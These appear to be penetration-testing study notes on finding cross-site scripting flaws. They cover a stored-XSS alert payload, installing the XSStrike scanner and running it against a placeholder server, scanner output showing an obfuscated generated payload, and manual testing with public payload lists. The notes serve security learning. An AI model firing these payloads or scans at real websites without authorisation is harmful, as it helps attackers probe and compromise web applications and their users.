XSS

Stored XSS

Test whether the page is vulnerable to XSS:

<script>alert(window.origin)</script>

---

XSS Discovery

Some of the common open-source tools that can assist us in XSS discovery are XSS Strike, Brute XSS, and XSSer.

neutron@kali[/kali]$ git clone https://github.com/s0md3v/XSStrike.git
neutron@kali[/kali]$ cd XSStrike
neutron@kali[/kali]$ pip install -r requirements.txt
neutron@kali[/kali]$ python xsstrike.py

XSStrike v3.1.4
...SNIP...

Reflected XSS example

neutron@kali[/kali]$ python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" 

        XSStrike v3.1.4

[~] Checking for DOM vulnerabilities 
[+] WAF Status: Offline 
[!] Testing parameter: task 
[!] Reflections found: 1 
[~] Analysing reflections 
[~] Generating payloads 
[!] Payloads generated: 3072 
------------------------------------------------------------
[+] Payload: <HtMl%09onPoIntERENTER+=+confirm()> 
[!] Efficiency: 100 
[!] Confidence: 10 
[?] Would you like to continue scanning? [y/N]

---

Manual Discovery

The most basic method of looking for XSS vulnerabilities is manually testing various XSS payloads against an input field in a given web page. We can find huge lists of XSS payloads online, like the one on PayloadAllTheThings or the one in PayloadBox. We can then begin testing these payloads one by one by copying each one and adding it in our form, and seeing whether an alert box pops up.